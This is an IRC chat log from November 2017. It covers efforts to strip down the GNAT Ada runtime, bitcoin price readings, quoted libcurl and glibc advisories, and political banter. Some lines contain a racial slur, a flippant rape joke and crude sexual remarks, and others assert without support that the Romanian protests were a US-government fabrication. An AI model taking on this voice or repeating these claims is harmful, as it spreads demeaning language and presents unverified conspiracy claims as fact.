1743831;1511894617;asciilifeform;http://btcbase.org/log/2017-11-27#1743378 slowly 1743832;1511894617;a111;Logged on 2017-11-27 20:35 asciilifeform: mircea_popescu: i've cut ffa into 30 pieces, each ~1 pg; -> bl0g article. 1743833;1511894652;asciilifeform;and continued headaching over http://btcbase.org/log/2017-11-27#1743395 1743834;1511894652;a111;Logged on 2017-11-27 20:40 asciilifeform: currently asciilifeform is barfing over the fact that adacore's gnat is happy to build static 'independent library' .a while gpl gcc's gnat barfs 1743835;1511894775;mod6;huh. 1743836;1511895535;asciilifeform;mod6: it's an afaik unjustifiable divergence in how the 2 gnats' 'gprbuild' util behaves. 1743837;1511895585;mod6;ugh. 1743838;1511895641;mod6;and adacore's is supposed to be canonical im guessing? 1743839;1511895679;asciilifeform;on some far-away planet, there is a standard sane os and language standards cover linking. 1743840;1511895681;asciilifeform;but not here. 1743841;1511895717;mod6;fair enough 1743842;1511895774;asciilifeform;and i dun have any particular warm feelings for either set of derps 1743843;1511895790;asciilifeform;( gnu-gnat or adacore-gnat people ) 1743844;1511895797;mod6;*nod* 1743845;1511895808;asciilifeform;the former seem to exist solely by mooching from the latter -- who largely eat from usg 1743846;1511895824;mod6;basically my mental picture of the whole thing 1743847;1511895843;asciilifeform;but otherwise http://btcbase.org/log/2017-11-27#1743398 so far. 1743848;1511895843;a111;Logged on 2017-11-27 20:42 asciilifeform: i'd naively expect that adacore's item would be the satanic one, and gcc's fork -- the functional. but so far in no case was this the finding. 1743849;1511896154;mircea_popescu;http://btcbase.org/log/2017-11-28#1743816 << this is actually a pretty great point. yes, exactly. 1743850;1511896154;a111;Logged on 2017-11-28 16:30 asciilifeform: 'dreamer' culture is somewhat like a school of pilotage absent the landing. 1743851;1511896263;mircea_popescu;tractor, while just as real as oxplow, is nevertheless no kind of oxplow ; sewing machine, while just as sewy as sewing by hand, nevertheless not a mechanical sewing hand ; airplane, while just as aflight as bird, nevertheless not mechanical wing flapper. and so on. 1743852;1511896330;mircea_popescu;http://btcbase.org/log/2017-11-28#1743827 << a damn, i missed the big moment ? 1743853;1511896330;a111;Logged on 2017-11-28 17:56 jhvh1: asciilifeform: Bitstamp BTCUSD last: 9915.01, vol: 9889.25891721 | Bitfinex BTCUSD last: 9910.1, vol: 43921.30261443 | Kraken BTCUSD last: 9846.5, vol: 2382.27948271 | Volume-weighted last average: 9908.26779661 1743854;1511896342;mircea_popescu;10k, bitch. where's your government now ? 1743855;1511896354;asciilifeform;eh to quote mircea_popescu , who the hell cares what happens at a gox 1743856;1511896364;mircea_popescu;the gox ppls! 1743857;1511896396;mircea_popescu;same idiots as "o noes, unforkable bitcoin is not valuable!!11" continuously since 2013. 1743858;1511896398;asciilifeform;to the extent they actually do something other than generate and post random numbers -- sure 1743859;1511896759;ben_vulpes;and in other censorsheeps http://www.business-review.eu/news/certain-facebook-users-in-romania-see-content-related-to-street-protests-reviewed-under-community-standards-153255 1743860;1511896799;asciilifeform;'The common notification from Facebook was that the post was under review to see if it breached the community standards. Other posts about the protests were suspected by Facebook of being spam.' << lol!! 1743861;1511896860;mircea_popescu;doh. 1743862;1511896894;mod6;Let them filter spam. 1743863;1511896914;ben_vulpes;mod6: antoinette reference? 1743864;1511896924;mod6;maaaaybe 1743865;1511896928;mod6;:D 1743866;1511896962;ben_vulpes;"we don't have any real news!" "eh, let them filter spam." 1743867;1511896982;ben_vulpes;could also be a "pound sand" replacement: "eh, filter spam" 1743868;1511897013;asciilifeform;oh noez colourrevolution enzyme aint supposed to digest godly usg-approved muppetstate!11 1743869;1511897065;mircea_popescu;ftr : romanian "protests" entirely usg fabrication, https://www.state.gov/r/pa/prs/ps/2017/11/275899.htm etc. the way this gets implemented in practice is that local usg-alligned orcs "leverage their network". which in romania is a few kids with "network skillz", ie two bit "blackhatwordld" injuns/niggers. 1743870;1511897108;mod6;2 girls, 1 crimper 1743871;1511897165;mircea_popescu;http://trilema.com/2012/amintiri-de-la-revolutia-lui-calafat/ << EXACT same item, same people, same props, same everything, 5years ago. 1743872;1511897200;asciilifeform;lol ro majdan 1743873;1511897366;mircea_popescu;anyway, the whole thing is "we captured the ro judiciary, the wave turned, we're trying to defend this asset for now". 1743874;1511897370;mircea_popescu;it won't hold. 1743875;1511897391;asciilifeform;captured for what? the 'corruption' racket ? 1743876;1511897395;mircea_popescu;yup. 1743877;1511897397;asciilifeform;aa 1743878;1511897424;mircea_popescu;"don't vote for x, he not only would confiscate our constanta base BUT IS VERY CORRUPT" sorta bs. 1743879;1511897442;mircea_popescu;somehow the idiots didn't see that whole thing for the trap it was. "first, let them build it, doh" 1743880;1511897523;mircea_popescu;(the geostrategic situation, for the very understandably disinterested, is that usg can not maintain pretense of mediteranean presence without ground missiles in constanta, because the ru navy actually works whereas the us clittorals do not.) 1743881;1511897552;asciilifeform;turks not enuff ? 1743882;1511897579;mircea_popescu;nope. russians can now jam. either you get them next to sevastopol or forget it. 1743883;1511897597;mircea_popescu;thereby "corruption = the rent is about to go up ~1`984x" 1743884;1511897644;asciilifeform;hey if usg ~to this day~ has gitmo, inside a cuba, for 0 rent, why not costanta 1743885;1511897662;mircea_popescu;because what trhe fuck is cuba. 1743886;1511897745;asciilifeform;dunno, small bananistan with a surprisingly successful history of expelling usg ? 1743887;1511897780;mircea_popescu;islands dude. islands are undefensible. 1743888;1511897870;asciilifeform;dunno, castro defended for 50y 1743889;1511897892;mircea_popescu;ended in the 70s, so not really. 1743890;1511897897;mircea_popescu;coupla decades. 1743891;1511897900;asciilifeform;ended?? 1743892;1511897903;mircea_popescu;yeah. 1743893;1511897905;asciilifeform;how's that 1743894;1511897916;asciilifeform;afaik usg Official Truth to this day is 'cuba Must Die' 1743895;1511897921;mircea_popescu;i don't recall castro making any decision in the kennedy ultimatum, at any juncture. 1743896;1511897941;asciilifeform;the bay of pigs folx got their arse handed to'em neh 1743897;1511897950;mircea_popescu;if hruschev went "well, it's up to castro", then defended. 1743898;1511897991;asciilifeform;cuba not overrun even after hrusch withdrew 1743899;1511897998;asciilifeform;why not ? 1743900;1511898026;mircea_popescu;same reason you didn't rape some fatty. 1743901;1511898054;mircea_popescu;"not overrun" but i don't see it sending agents to blow up dept of state trashbins. 1743902;1511898056;asciilifeform;i'm not sold that this fatty was fat. ru signals base happily churned along in cuba until '93 or so 1743903;1511898081;mircea_popescu;at some point, cuba was exactly 1980s libya, attacked usg frigates in port and paid people to bomb 1743904;1511898110;asciilifeform;libya had petro moneys 1743905;1511898113;asciilifeform;cuba -- poor 1743906;1511898128;mircea_popescu;for whatever reason it may have occured. 1743907;1511898136;asciilifeform;iirc stopped with the frigates when su so ordered. 1743908;1511898141;asciilifeform;( cuba, that is ) 1743909;1511898166;mircea_popescu;more like, when stalin died. cuba was international socialism thing. like mexico. 1743910;1511903656;asciilifeform;!~ticker --market all 1743911;1511903662;jhvh1;asciilifeform: Bitstamp BTCUSD last: 9872.54, vol: 10977.65162483 | Bitfinex BTCUSD last: 9889.0, vol: 48178.83177407 | Kraken BTCUSD last: 9786.0, vol: 2454.29600468 | Volume-weighted last average: 9881.96414299 1743912;1511903670;asciilifeform;... epic goxlag tho. 1743913;1511903738;ben_vulpes;REEEEEEEEEESPONSIBLE DISCLOSUREEEEEEEEE https://twitter.com/lemiorhan/status/935578694541770752 1743914;1511903869;asciilifeform;pretty great. 1743915;1511903941;ben_vulpes;the responsible disclosure whining is pretty lolarious 1743916;1511904589;mircea_popescu;the expectation on the part of the usg drones that usg gets a private first pass for being usg is something else. 1743917;1511904602;BingoBoingo;!~ticker --market all --currency eur 1743918;1511904606;mircea_popescu;somehow "criminal" isn't supposed to FIRST be notified PRIVATELY about how usg aims to assault. 1743919;1511904608;jhvh1;BingoBoingo: Bitfinex BTCEUR last: 8312.9, vol: 1584.62517085 | Kraken BTCEUR last: 8280.0, vol: 6766.91938897 | Volume-weighted last average: 8286.24245824 1743920;1511904630;mircea_popescu;this is what's gonna be the new response to police "arrest" : you DID first send a PM right ? 1743921;1511905085;mod6;<+ben_vulpes> the responsible disclosure whining is pretty lolarious << very. 1743922;1511905182;asciilifeform;!!up The20YearIRCloud 1743923;1511905183;deedbot;The20YearIRCloud voiced for 30 minutes. 1743924;1511905189;The20YearIRCloud;I feel special now 1743925;1511905231;asciilifeform;The20YearIRCloud: looking for anything in particular ? 1743926;1511905259;The20YearIRCloud;Not so much, just wondered what happened to the exchange, or if i'm missing something 1743927;1511905280;The20YearIRCloud;and bitbet or whateverit was called 1743928;1511905444;ben_vulpes;The20YearIRCloud: there are logs, nobody is going to read them for you. 1743929;1511905458;ben_vulpes;if you're keeping up, you're falling behind. 1743930;1511905463;ben_vulpes;not* keeping up 1743931;1511905565;The20YearIRCloud;yay 1743932;1511905900;BingoBoingo;http://btcbase.org/log/2017-11-28#1743697 << I suspected it was the appeal of contest in attempting to carve out a local space where one tries to out-God the Gods 1743933;1511905900;a111;Logged on 2017-11-28 13:28 mircea_popescu: i never quite understood why gardening is universally popular. 1743934;1511905932;mircea_popescu;so you can watch every single bug and worm piss on you from high above ? 1743935;1511905977;BingoBoingo;And smite the ones you spot, learn from the experience and bring a better game next season. Very much a resistance of the medium sorta thing. 1743936;1511905980;mircea_popescu;the trick with Gods is that they're not fucking Atlas, supporting the world on own shoulder each and every day or else. http://btcbase.org/log/2016-04-07#1448124 very much apropos. 1743937;1511905980;a111;Logged on 2016-04-07 17:50 mircea_popescu: basically, all the architecture systems architects have managed yet to produce is the equivalent of "we need 10.1k builders - 100 to build and 10k to hold up the walls once we're done". 1743938;1511906088;BingoBoingo;Hey, if the Gods raid your playing god patch with a bunch of voracious bunny rabbit mobs, then you've gardened delicious rabbit 1743939;1511906175;BingoBoingo;And not all gardening is food. There's also the decorative gardens for getting randy with the ladies 1743940;1511906196;mircea_popescu;i've been making candlewax garden of late. shit's fun. 1743941;1511906247;*;BingoBoingo plans to wait at least one year before trying to terraform any corners or Uruguay 1743942;1511906306;mircea_popescu;good idea. 1743943;1511906316;mircea_popescu;at least cursory familiarity with the poisonous plants pre-required 1743944;1511906601;The20YearIRCloud;mircea_popescu: I had someone ask about those posters if they were valid today, oddly enough 1743945;1511906609;The20YearIRCloud;(Thus me finding the chat again) 1743946;1511906617;mircea_popescu;the who ? 1743947;1511906628;The20YearIRCloud;The posters you paid for, ~3yrs ago 1743948;1511906638;mircea_popescu;link ? 1743949;1511906651;mircea_popescu;i have paid for so many posters... what is this, the pili thing ? 1743950;1511906673;The20YearIRCloud;for property tenants of my company, 2-3 years ago, gave out a bunch of posters to ungreatful tenants whom you offered 0.5btc to 1743951;1511906696;mircea_popescu;ahahahaha 1743952;1511906698;mircea_popescu;oookay. 1743953;1511906709;mircea_popescu;send them to http://trilema.com/2014/ill-pay-for-your-tits/ 1743954;1511906723;The20YearIRCloud;ha ha ha, i actually thought about that 1743955;1511906736;The20YearIRCloud;Are you still paying 0.02? 1743956;1511906765;mircea_popescu;yes. 1743957;1511906774;The20YearIRCloud;Dang, that's a bit generous, don't you think? 1743958;1511906788;mircea_popescu;yes. 1743959;1511906813;mircea_popescu;but hey, 0.5 was also VERY generous ; and in general everything i do is. meanwhile the fucktards http://btcbase.org/log/2017-11-28#1743513 1743960;1511906813;a111;Logged on 2017-11-28 03:39 mircea_popescu: somehow if the usg website comes up with "it's illegal to smoke", they stop smoking, AS FUCKING IF. whereas when the republic orders, they "have options". 1743961;1511906825;The20YearIRCloud;I'll let em know. For some reason I have t his awful feeling they'll be more apt for that then to take the freebie offered years ago 1743962;1511906839;mircea_popescu;of course. 1743963;1511906859;The20YearIRCloud;0.5 was fantastically generous at the time (It was like $50 if memory serves me right), but like i said, and I could find the chat log, i was (And continue to deal with) idiots on a daily basis 1743964;1511906900;mircea_popescu;!!ratings The20YearIRCloud 1743965;1511906902;deedbot;http://p.bvulpes.com/pastes/bodzD/?raw=true 1743966;1511906916;The20YearIRCloud;new system? 1743967;1511906917;mircea_popescu;!!key The20YearIRCloud 1743968;1511906918;deedbot;Not registered. 1743969;1511906928;mircea_popescu;not really. 1743970;1511906936;mircea_popescu;rather i expect new name ? 1743971;1511906969;The20YearIRCloud;possibly, it was just the20year earlier 1743972;1511907015;mircea_popescu;!!ratings The20Year 1743973;1511907016;deedbot;http://p.bvulpes.com/pastes/U06qL/?raw=true 1743974;1511907056;mircea_popescu;!!reputation The20Year 1743975;1511907057;deedbot;http://p.bvulpes.com/pastes/Jz0eA/?raw=true 1743976;1511907130;mircea_popescu;trinque did i mention how great eg http://wot.deedbot.org/0FC17787D364466DC5686B4F31AF6822CA3B400F.html is recently ? 1743977;1511907184;trinque;not bad eh? 1743978;1511907189;mircea_popescu;perfect. 1743979;1511907377;BingoBoingo;Poor The20YearIRCloud , insufficient ratings to bid for colo space 1743980;1511907814;BingoBoingo;Recovery from Havelol will prolly take substantial tit wrangling 1743981;1511908105;mircea_popescu;apparently the expectation is that 3 year rule. 1743982;1511911831;BingoBoingo;What was that again? Shame, disappear for 3 years and slave away in the tit mines? 1743983;1511912592;BingoBoingo;In gr8 gardenings http://trilema.com/2013/growin-my-own/ 1743984;1511919538;*;asciilifeform yet again, for 3rd time in 2 yrs, attempted and failed to build a 'zero foot print runtime' for gnat -- to abolish the 3MB of liquishit it shits into every executable. 1743985;1511919579;asciilifeform;supposedly this is one of the items included in the 'pro' payware gnat. and they have made re-creating it as painful as they could. 1743986;1511919673;asciilifeform;funnily enough adacore itself publishes a great many cut-down runtimes for various embedded boxes, e.g. https://bitbucket.org/tkoskine/embedded-arm-gnat-rts/src . BUT they are not usable: 1) there is -- quite deliberately -- not one targeting conventional userland linux 2) none of them support exception handling, which wouldn't be a problem except that ALL BOUNDS CHECKS ARE EXCEPTIONTRONIC 1743987;1511919746;asciilifeform;see , http://btcbase.org/log/2017-11-21#1741741 , but a RUNNABLE linked elf is multi-MB and full of turd and quite unauditable. 1743988;1511919746;a111;Logged on 2017-11-21 18:36 asciilifeform: in other noose, ffa elf on x86-64 with no inlinings and stripped .a , is ~50kB 1743989;1511919991;asciilifeform;the approach to making a rts ( gnatruntime ) from 0, depicted in e.g. https://github.com/alkhimey/Ada_Kernel_Module_Toolkit works -- but does not result in a ffa-usable rts , because the boundschecking exceptionhandlers are not present. 1743990;1511920040;asciilifeform;so the next logical thing is, you go and find where yer gnat's a-except.adb/ads live, and try and backport'em, right ? 1743991;1511920069;asciilifeform;but then welcome to an inner circle of hell, because it's a mass of ??? interdependently glued to itself with broken glass 1743992;1511920104;asciilifeform;( hey lamer, you wanted No_Secondary_Stack restriction ? fuck you, we used variable-length strings for the exception message passing. and 9,001 of similar item. ) 1743993;1511920243;ben_vulpes;brutal 1743994;1511920262;asciilifeform;oh that ain't all 1743995;1511920276;ben_vulpes;lol go on? 1743996;1511920285;asciilifeform;bonus hell : if you want to build a rts, you gotta use "-gnatg" flag. or you get: 1743997;1511920292;asciilifeform;'user-defined descendants of package System are not allowed' 1743998;1511920305;asciilifeform;and ditto package Ada ( exceptions ) and pretty much the rest of your rts 1743999;1511920314;asciilifeform;now for the ultimate barf : 1744000;1511920351;asciilifeform;the docs ( https://docs.adacore.com/gnat_ugn-docs/html/gnat_ugn/gnat_ugn/building_executable_programs_with_gnat.html ) but gnu's agree give us: 1744001;1511920358;asciilifeform;'Internal GNAT implementation mode. This should not be used for applications programs, it is intended only for use by the compiler and its run-time library. For documentation, see the GNAT sources. Note that -gnatg implies -gnatw.ge and -gnatyg so that all standard warnings and all standard style options are turned on. All warnings and style messages are treated as errors.' 1744002;1511920370;asciilifeform;this means 1) no docs. at. all 1744003;1511920381;asciilifeform;2) style fascism is turned on AND CANNOT BE TURNED OFF 1744004;1511920411;asciilifeform;which means that none of my code even builds, because gnat then insists on adacore's idiotic massive-extra-spaces-everywhere stylistics. 1744005;1511920431;ben_vulpes;are these stylistics part of the spec or what 1744006;1511920434;asciilifeform;nope. 1744007;1511920442;asciilifeform;they are part of they-don't-want-you-to-do-this. 1744008;1511920462;asciilifeform;it's a sabotaged proggy. 1744009;1511920491;asciilifeform;the tentative conclusion : asciilifeform is condemned to take ownership of gnat, and burn out the nonsense with hot irons. 1744010;1511920540;asciilifeform;i'ma have to do it after ffa/p tho. but really this is ridiculous, the built binaries are not auditable until we extirpate the ball of nonsense. 1744011;1511920587;ben_vulpes;sad stuff, asciilifeform . 1744012;1511920593;asciilifeform;ffa.a stripped is 50kB; 'hello world' without anything whatsoever, null procedure, is 3.5MB 1744013;1511920613;asciilifeform;( stripped -- 1 or so ) 1744014;1511920619;ben_vulpes;pffflol that's epic 1744015;1511920651;asciilifeform;granted it's a standard lib, and contains various items like the ( spiffy, but i dun use it in p !!! ) threading system 1744016;1511920664;ben_vulpes;unrelatedly asciilifeform i saw you mention 'goxlag' a few times recently, is bitfinex not releasing btc? 1744017;1511920681;asciilifeform;ben_vulpes: goxlag , recall, was ping delay 1744018;1511920694;asciilifeform;whether or not the gox has transitioned to the next dwarf stage is immaterial 1744019;1511920713;ben_vulpes;heh verily i do not remember, 'twas not a concern 1744020;1511920728;asciilifeform;anyway i'ma bbl. 1744021;1511922052;mod6;<+ben_vulpes> sad stuff, asciilifeform . << uuuugh indeed. 1744022;1511924000;asciilifeform;it aint just exceptions, either. gnat happily ignores the fact that strings package isn't used, and inserts a dependency on it for the linker to barf on. ditto tasks, and a dozen other. 1744023;1511924121;asciilifeform;for n00bz : 'rts' in ada world is approx equiv of libc. 1744024;1511924530;asciilifeform;!~ticker --market all 1744025;1511924538;jhvh1;asciilifeform: Bitstamp BTCUSD last: 10133.47, vol: 12721.68555284 | Bitfinex BTCUSD last: 10135.0, vol: 52631.12235665 | Kraken BTCUSD last: 9984.0, vol: 2760.11355154 | Volume-weighted last average: 10128.5953221 1744026;1511924555;asciilifeform;ding. 1744027;1511926242;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/dpo8I/?raw=true << sample rts eggogology , to round out the thread. 1744028;1511926300;asciilifeform;( and yes with a c 'main.c' , otherwise motherfucker dun even have any idea where .code seg starts ) 1744029;1511926565;*;mod6 looks 1744030;1511926635;mod6;b__main.adb:(.text.adainit+0xfd): undefined reference to `ada__strings_E' << this is sad, really. 1744031;1511930129;BingoBoingo;!~ticker --market all 1744032;1511930135;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 10365.97, vol: 13620.94227422 | Bitfinex BTCUSD last: 10322.0, vol: 59759.57629282 | Kraken BTCUSD last: 10270.0, vol: 3132.98027755 | Volume-weighted last average: 10327.6983129 1744033;1511930146;BingoBoingo;Quite the thrashing crashing 1744034;1511930403;asciilifeform; nao if it were to grow just oooone moar 0..! 1744035;1511930465;ben_vulpes;give it a half decade 1744036;1511930486;asciilifeform;lol 1744037;1511930532;BingoBoingo;Or till March, or whatever man. Great Again cannot Make Great in a single day. 1744038;1511930906;asciilifeform;at current price , e.g., ro passport , costs ~75 btc. 1744039;1511930992;BingoBoingo;What, there's no route for earnestly living there and waiting for that next zero in .ro ? 1744040;1511931000;mod6;yeah, zero 1744041;1511931003;mod6;i like that better 1744042;1511931103;asciilifeform;BingoBoingo: only if you have a mircea_popescu-strength meat otc wot 1744043;1511931292;asciilifeform;as it is, asciilifeform couldn't even sell 1 btc in here in usgistan, even if wanted to. 1744044;1511931505;asciilifeform;nor, for that matter, to buy. 1744045;1511932127;mats;bitcoin-otc still lives, you know 1744046;1511932146;mats;at least 1 fiat broker offering cash in mail 1744047;1511932202;asciilifeform;lol 10k promisetronium via usgmail from rando 1744048;1511932206;asciilifeform;what could be better. 1744049;1511932214;mats;one even has an mp rating! 1744050;1511932225;asciilifeform;usgmail has no mprating. 1744051;1511932249;mats;anyone know how many megatonnes move through usg domestic mail? 1744052;1511932259;asciilifeform;irrelevant, 1744053;1511932340;asciilifeform;for some they move rembrandts, for others , like yours truly, they confiscate $5 package of screws. 1744054;1511932370;mod6;haha 1744055;1511932470;mats;one guy's even known to fly cross country to meet clients 1744056;1511932623;asciilifeform;known to whom ? 1744057;1511932626;asciilifeform;not me. 1744058;1511932658;asciilifeform;and dafuq do i need a suitcase of green for inside usaschwitz. 1744059;1511933063;*;asciilifeform bbl,meat 1744060;1511933270;mats;well, if you're looking to sell, the one guy can wire, ach, bank deposit, according to listing in order book 1744061;1511933441;mats;you could hawala if you don't want to give up your PII to the guy 1744062;1511933487;ben_vulpes;remember the good old days of bank deposits? 1744063;1511935179;mircea_popescu;http://btcbase.org/log/2017-11-28#1743982 you know, "all is forgotten in 3 years", like the jews' ancient "7 year festival" 1744064;1511935179;a111;Logged on 2017-11-28 23:30 BingoBoingo: What was that again? Shame, disappear for 3 years and slave away in the tit mines? 1744065;1511935225;BingoBoingo;AH 1744066;1511935248;mircea_popescu;http://btcbase.org/log/2017-11-29#1743984 << what failed ? teh very detailed discussion of each of these 3, MEGA blog fodder. 1744067;1511935248;a111;Logged on 2017-11-29 01:38 asciilifeform yet again, for 3rd time in 2 yrs, attempted and failed to build a 'zero foot print runtime' for gnat -- to abolish the 3MB of liquishit it shits into every executable. 1744068;1511939459;mircea_popescu;http://btcbase.org/log/2017-11-29#1743992 << jesus christ. 1744069;1511939459;a111;Logged on 2017-11-29 01:48 asciilifeform: ( hey lamer, you wanted No_Secondary_Stack restriction ? fuck you, we used variable-length strings for the exception message passing. and 9,001 of similar item. ) 1744070;1511939602;mircea_popescu;"For documentation, see the GNAT sources." bwahaha 1744071;1511939702;mircea_popescu;http://btcbase.org/log/2017-11-29#1744011 << in fairness, it was only even said we might want to do this http://btcbase.org/log/2017-11-18#1740281 ie two weeks ago. 1744072;1511939702;a111;Logged on 2017-11-29 01:56 ben_vulpes: sad stuff, asciilifeform . 1744073;1511939702;a111;Logged on 2017-11-18 16:02 mircea_popescu: i would much prefer to have a v-root for whatever bios, with the binary clearly laid out, so people with the competence can take it apart. 1744074;1511939845;mircea_popescu;http://btcbase.org/log/2017-11-29#1744035 << it was 1k this year. 1744075;1511939845;a111;Logged on 2017-11-29 04:41 ben_vulpes: give it a half decade 1744076;1511939858;mircea_popescu;i just hope 100k doesn't happen before new year's. 1744077;1511940308;deedbot;http://trilema.com/2017/why-is-fighting-corruption-the-pantsuit-callsign/ << Trilema - Why is "fighting corruption" the pantsuit callsign ? 1744078;1511959427;shinohai;!~ticker --market all 1744079;1511959439;jhvh1;shinohai: Bitstamp BTCUSD last: 10896.81, vol: 19640.93177920 | Bitfinex BTCUSD last: 10900.0, vol: 85373.05648051 | Kraken BTCUSD last: 10948.2, vol: 5084.46936032 | Volume-weighted last average: 10901.656852 1744080;1511959456;shinohai;it falls to 10k 1744081;1511960707;asciilifeform;http://btcbase.org/log/2017-11-29#1744071 << http://btcbase.org/log/2017-09-14#1714372 and earlier still. 1744082;1511960707;a111;Logged on 2017-11-29 07:15 mircea_popescu: http://btcbase.org/log/2017-11-29#1744011 << in fairness, it was only even said we might want to do this http://btcbase.org/log/2017-11-18#1740281 ie two weeks ago. 1744083;1511960707;a111;Logged on 2017-09-14 17:24 asciilifeform: ^ which does mean that i'ma have to a) audit the binary when ffa built for use in the field b) patch gcc/gnat not to emit DIV 1744084;1511960726;asciilifeform;safety-critical coad gets binaudited, even in heathendom 1744085;1511960812;asciilifeform;( there is not , for perfectly fundamental reasons, a compiler that can be blindly trusted -- to work correctly, not even speaking of thompsonism here ) 1744086;1511961228;asciilifeform;( see also: http://btcbase.org/log/2017-04-03#1636708 ) 1744087;1511961228;a111;Logged on 2017-04-03 22:14 asciilifeform: incidentally the folx who designed ada, read thompson's paper. and immediately acted. which is why in ada you get 'driving stick'-style control over the compiler, the order in which it puts down routines, and data structures during 'elaboration', and can leave bread crumbs for manual binary auditor (yes) to look for when he compares (yes) binaries built on different systems for same rocket. 1744088;1511962068;asciilifeform;http://btcbase.org/log/2017-11-29#1744060 << lol mats why would i want it in a usg-transparent bank ? 1744089;1511962068;a111;Logged on 2017-11-29 05:27 mats: well, if you're looking to sell, the one guy can wire, ach, bank deposit, according to listing in order book 1744090;1511962233;asciilifeform;the only thing asciilifeform would ever consider spending coinz on, is a perma-ticket out of the shitreich. 1744091;1511962325;asciilifeform;i dun need a barrel of green for anything ( the only place i can spend it here, is the veggie market. and at airport they confiscate any over 10k . ) nor is depositolade in usgbank of any use, obummer immediately claims half 1744092;1511962356;asciilifeform;pretty sure we had this thread. 1744093;1511962392;asciilifeform;including the oblig 'hey, i get away with it' 'because you ain't under the microscope' 1744094;1511962561;asciilifeform;http://btcbase.org/log/2017-11-29#1744066 << ~all the detail in yesterday's log. gnat inserts dependencies on the rts even when not only not used but pragma-restricted against e.g. secondarystack, elaboration, stringism, taskism 1744095;1511962561;a111;Logged on 2017-11-29 06:00 mircea_popescu: http://btcbase.org/log/2017-11-29#1743984 << what failed ? teh very detailed discussion of each of these 3, MEGA blog fodder. 1744096;1511962675;asciilifeform;there is a mode ( see also log ) where it doesn't insert anything, that is used traditionally to compile gnat itself. but there it hard-enforces adacore's weird style scheme, and cannot be forced not to. i'ma have to patch. 1744097;1511962710;asciilifeform;q nao is which gnat to patch -- and take as a pet, and genesis etc 1744098;1511962806;asciilifeform;( i also haven't fully verified that the self-building mode is able to insert ~no~ spurious deps, in stock gnat ) 1744099;1511962899;asciilifeform;http://btcbase.org/log/2017-11-29#1744076 << curious - why ? 1744100;1511962899;a111;Logged on 2017-11-29 07:17 mircea_popescu: i just hope 100k doesn't happen before new year's. 1744101;1511963014;asciilifeform;!~ticker --market all 1744102;1511963019;jhvh1;asciilifeform: Bitstamp BTCUSD last: 10955.0, vol: 19967.78020329 | Bitfinex BTCUSD last: 10914.0, vol: 84625.04203831 | Kraken BTCUSD last: 10821.4, vol: 5405.81666339 | Volume-weighted last average: 10916.8918573 1744103;1511963131;*;asciilifeform bbl,teatime 1744104;1511964038;mircea_popescu;asciilifeform does insert "unicode support" ? :D 1744105;1511964042;mircea_popescu;could be the criterion. 1744106;1511966002;mircea_popescu;http://trilema.com/2016/liberals-what-liberals/#footnote_1_70002 << in which i discover idiocy even has a name. apparently it was CEDR, back in 2016! 1744107;1511966214;asciilifeform;mircea_popescu: oddly enough, pragma Restrictions(No_Wide_Characters) actually worx. 1744108;1511966226;mircea_popescu;well that's something. 1744109;1511966246;asciilifeform;a good chunk of'em -- work 1744110;1511966247;mircea_popescu;asciilifeform could you just write emacs mode to fix the spacing/style ? possibly cheaper than sawing gnat apart. 1744111;1511966264;asciilifeform;mircea_popescu: looking into it. 1744112;1511966287;asciilifeform;i suspect it's retarded in other ways tho, and will have to be cured in the end 1744113;1511966298;mircea_popescu;prolly 1744114;1511966418;asciilifeform;see, gotta get not only auditable, but romable p. 4MB ball of ??? ain't romable. 1744115;1511966470;asciilifeform;( dun think any of my opteron boxes know how to address >4MB of rom ~total~ , for instance. ) 1744116;1511966649;asciilifeform;meanwhile, in heathendom ! https://curl.haxx.se/docs/adv_2017-af0a.html >> 'libcurl contains an out boundary access flaw in SSL related code. When allocating memory for a connection (the internal struct called connectdata), a certain amount of memory is allocated at the end of the struct to be used for SSL related structs ... The math used to calculate the extra memory amount necessary for the SSL library was wrong on 32 bit systems, 1744117;1511966649;asciilifeform; which made the allocated memory too small by 4 bytes. The last struct member of the last object within the memory area could then be outside... ' etc 1744118;1511966678;mircea_popescu;i recall reading this a while backl 1744119;1511966682;asciilifeform;new one. 1744120;1511966743;asciilifeform;http://btcbase.org/log/2016-02-16#1406884 << the prev 1744121;1511966743;a111;Logged on 2016-02-16 15:59 asciilifeform: 'The glibc DNS client side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack.' 1744122;1511966755;mircea_popescu;na i meant specifically re curl 1744123;1511966798;asciilifeform;oh here http://btcbase.org/log/2017-08-11#1697186 is the prev. 1744124;1511966798;a111;Logged on 2017-08-11 20:20 asciilifeform: and not wholly unrelatedly, https://curl.haxx.se/docs/adv_20170809C.html << libcurl 0d 1744125;1511966804;asciilifeform;quite similar. 1744126;1511966816;mircea_popescu;aha 1744127;1511966844;asciilifeform;and i'ma save some wear on ye olde kbd, and leave a http://btcbase.org/log/2017-08-11#1697191 . 1744128;1511966844;a111;Logged on 2017-08-11 20:25 asciilifeform: https://curl.haxx.se/changes.html#7_55_0 << holy SHIT that's a lengthy buglist for a proggy that... loads http and puts to stdout 1744129;1511967440;asciilifeform;!~later tell phf do you happen to have a copy of bolix's adatron src ? dun look like it's on the classical disk set, at least not in src form. 1744130;1511967440;jhvh1;asciilifeform: The operation succeeded. 1744131;1511967848;mircea_popescu;aaand in alien notions of success, https://www.youtube.com/watch?v=xj2DPynmgXU 1744132;1511967951;asciilifeform;lol i half-expected the cufflinks to read 'btc' 1744133;1511967956;mircea_popescu;lel. 1744134;1511967969;mircea_popescu;you know i managed to lose the pair ? 1744135;1511967974;asciilifeform;damn! 1744136;1511967984;asciilifeform;lemme guess, at sea ? 1744137;1511967987;mircea_popescu;nfi where they went, possibly chick ended up swallowing. 1744138;1511968039;mircea_popescu;also managed to misplace a 2ct diamond i used to wear in mah lapel... utter puyi operation i'm running over here. 1744139;1511968065;mircea_popescu;one could live comfortably out of all the hazard-for-6-yos items i lose apparently. 1744140;1511968191;asciilifeform;and mouse could live for a century on the flakes of skin that fall of the elephant, why not. 1744141;1511968197;asciilifeform;*off 1744142;1511968300;mircea_popescu;iirc those cuffs were like 5 btc ? 15 ? something. 1744143;1511968345;asciilifeform;lol at least mircea_popescu had some cuffs for a spell. all i got for 5btc was losing to alphago and watching hitler cackle... 1744144;1511968394;mircea_popescu;bitter eh 1744145;1511968432;asciilifeform;it ain't like losing a bag of usd, or a diamond, not easy to forget. 1744146;1511968440;asciilifeform;the loss grows 4evah. 1744147;1511968446;mircea_popescu;all i got for 1k btc was averting this 2017 happening in 2014, let's call it. 